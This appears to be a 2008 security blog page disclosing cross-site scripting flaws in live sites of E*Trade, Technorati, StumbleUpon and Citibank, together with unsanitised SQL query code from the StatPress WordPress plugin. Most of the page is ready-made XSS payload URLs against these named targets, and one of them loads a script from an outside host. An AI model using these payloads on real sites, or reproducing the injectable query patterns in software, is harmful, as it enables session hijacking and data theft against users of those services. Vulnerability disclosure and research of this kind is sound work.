November 4th, 2008  | Tags: ,

Most of these require the user to be logged in, and for those who don’t know, the ‘expression’ technique only works on IE. You will need to use a different method if you want to test it on other browsers. See Rsnakes cheat sheet for exmaples.


https://www.etrade.wallst.com/v1/stocks/snapshot/symbol_lookup.asp?textIn=%22%3E%3Cscript%20src=%22http://www.hiredhacker.com/xss.js%22%3E%3C/script%3E


https://us.etrade.com/e/t/accounts/changemyivrpin?FROM_PAGE=changemypasswords%22+style=%22width:expression(alert(/owned/))


https://express.etrade.com/e/t/applogic/OLAMasterpage2?SC=NPNK4KV%22+style=%22width:expression(alert(/owned/))


https://us.etrade.com/e/t/user/login?TYPE=&REALMOID=&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=&TARGET=%22+style=%22width:expression(alert(/owned/))


https://global.etrade.com/e/t/intl/page?nav=3&subnav=4&screen=1%27;alert(/owned/);//&language=en&country=gl

(nav and subnav are also vulnerable parameters)
November 3rd, 2008  | Tags: , , ,

iriStatAppend()

// URL (requested)
$urlRequested = iri_StatPress_URL();
...
$referrer = (isset($_SERVER['HTTP_REFERER']) ? htmlentities($_SERVER['HTTP_REFERER']) : '');
...
$insert = "INSERT INTO " . $table_name . " (date, time, ip, urlrequested, agent, referrer, search,nation,os,browser,searchengine,spider,feed,user,timestamp) " . "VALUES ('$vdate','$vtime','$ipAddress','$urlRequested','" . addslashes(strip_tags($userAgent)) . "','$referrer','" . addslashes(strip_tags($search_phrase)) . "','" . iriDomain($ipAddress) . "','$os','$browser','$searchengine','$spider','$feed','$userdata->user_login','$timestamp')";
$results = $wpdb->query($insert);

iri_StatPress_Vars()

if (strpos(strtolower($body), "%thistotalvisits%") !== false)
{
    $qry = $wpdb->get_results("SELECT count(DISTINCT(ip)) as pageview FROM $table_name WHERE spider='' and feed='' AND urlrequested='" . iri_StatPress_URL() . "';");
    $body = str_replace("%thistotalvisits%", $qry[0]->pageview, $body);
}

There are more vulnerabilities, including sql injection (such as iriStatPressSearch()) and cross site scripting.

November 2nd, 2008  | Tags: ,

If anyone is interested, Technorati is full of bugs like this.


http://technorati.com/blogs/tag/%27%22%3E%3Cscript%3Ealert(1)%3C/script%3E


http://www.technorati.com/404please%27);alert(1);//


http://www.technorati.com/search/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

[POST]http://www.technorati.com/account/bio/?bio_blurb=&company=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&zipcode=&country=US&func=updateuser
November 1st, 2008  | Tags: ,

Free stumbles anyone?


http://www.stumbleupon.com/recover.php?email=no%40no.com%22%3E%3Cscript%3Ealert(1);%3C/script%3E


http://www.stumbleupon.com/find_friend.php?q=%22%3E%3Cscript%3Ealert(1);%3C/script%3E

October 31st, 2008  | Tags: ,
http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile=%2522%2522%253e%253cimg src=%2522%2522 onerror=%2522alert(1)%2522
Page 3 of 912345...Last »
TOP